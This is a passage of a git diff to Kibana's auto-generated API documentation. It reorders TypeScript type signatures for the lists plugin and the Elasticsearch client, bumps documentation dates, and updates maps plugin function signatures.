"x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2232,7 +2232,7 @@ "signature": [ "({ id }: ", "DeleteListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2268,7 +2268,7 @@ "signature": [ "({ listId, value, type, }: ", "DeleteListItemByValueOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2304,7 +2304,7 @@ "signature": [ "({ id }: ", "DeleteListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2374,7 +2374,7 @@ "signature": [ "({ deserializer, serializer, type, listId, stream, meta, version, }: ", "ImportListItemsToStreamOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2408,7 +2408,7 @@ "signature": [ "({ listId, value, type, }: ", "GetListItemByValueOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2444,7 +2444,7 @@ "signature": [ "({ id, deserializer, serializer, listId, value, type, meta, }: ", "CreateListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2478,7 +2478,7 @@ "signature": [ "({ _version, id, value, meta, }: ", "UpdateListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2512,7 +2512,7 @@ "signature": [ "({ _version, id, name, description, meta, version, }: ", "UpdateListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2546,7 +2546,7 @@ "signature": [ "({ id }: ", "GetListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2582,7 +2582,7 @@ "signature": [ "({ type, listId, value, }: ", "GetListItemsByValueOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2618,7 +2618,7 @@ "signature": [ "({ type, listId, value, }: ", "SearchListItemByValuesOptions", - ") => Promise<{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]>" + ") => Promise<{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2654,7 +2654,7 @@ "signature": [ "({ filter, currentIndexPosition, perPage, page, sortField, sortOrder, searchAfter, }: ", "FindListOptions", - ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" + ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2690,7 +2690,7 @@ "signature": [ "({ listId, filter, currentIndexPosition, perPage, page, sortField, sortOrder, searchAfter, }: ", "FindListItemOptions", - ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; } | null>" + ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -2757,7 +2757,7 @@ "an array with the exception list item entries" ], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client_types.ts", "deprecated": false @@ -3049,7 +3049,7 @@ "item exception entries logic" ], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client_types.ts", "deprecated": false @@ -3697,7 +3697,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -3765,7 +3815,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -3791,33 +3841,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -3843,33 +3867,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -4829,6 +4827,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/lists.mdx b/api_docs/lists.mdx index 932e2fa0b0335..16de39f551262 100644 --- a/api_docs/lists.mdx +++ b/api_docs/lists.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/lists title: "lists" image: https://source.unsplash.com/400x175/?github description: API docs for the lists plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'lists'] --- import listsObj from './lists.devdocs.json'; diff --git a/api_docs/management.mdx b/api_docs/management.mdx index cd4cf4dc77477..00e18485de783 100644 --- a/api_docs/management.mdx +++ b/api_docs/management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/management title: "management" image: https://source.unsplash.com/400x175/?github description: API docs for the management plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'management'] --- import managementObj from './management.devdocs.json'; diff --git a/api_docs/maps.devdocs.json b/api_docs/maps.devdocs.json index 26f459392cbd9..3ec66d75cdeca 100644 --- a/api_docs/maps.devdocs.json +++ b/api_docs/maps.devdocs.json @@ -466,18 +466,16 @@ "type": "Function", "tags": [], "label": "getFilters", - "description": [ - "\nTODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved" - ], + "description": [], "signature": [ - "() => Promise" + "() => Promise<", + "Filter", + "[]>" ], "path": "x-pack/plugins/maps/public/embeddable/map_embeddable.tsx", "deprecated": false, "children": [], - "returnComment": [ - "[]" - ] + "returnComment": [] }, { "parentPluginId": "maps", @@ -485,18 +483,16 @@ "type": "Function", "tags": [], "label": "getQuery", - "description": [ - "\nTODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved" - ], + "description": [], "signature": [ - "() => Promise" + "() => Promise<", + "Query", + " | undefined>" ], "path": "x-pack/plugins/maps/public/embeddable/map_embeddable.tsx", "deprecated": false, "children": [], - "returnComment": [ - "undefined" - ] + "returnComment": [] }, { "parentPluginId": "maps", @@ -1348,6 +1344,23 @@ "path": "x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx", "deprecated": false }, + { + "parentPluginId": "maps", + "id": "def-public.BoundsRequestMeta.embeddableSearchContext", + "type": "Object", + "tags": [], + "label": "embeddableSearchContext", + "description": [], + "signature": [ + "{ query?: ", + "Query", + " | undefined; filters: ", + "Filter", + "[]; } | undefined" + ], + "path": "x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx", + "deprecated": false + }, { "parentPluginId": "maps", "id": "def-public.BoundsRequestMeta.sourceQuery", diff --git a/api_docs/maps.mdx b/api_docs/maps.mdx index 744668f133b6e..62b34eb2f20e1 100644 --- a/api_docs/maps.mdx +++ b/api_docs/maps.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/maps title: "maps" image: https://source.unsplash.com/400x175/?github description: API docs for the maps plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 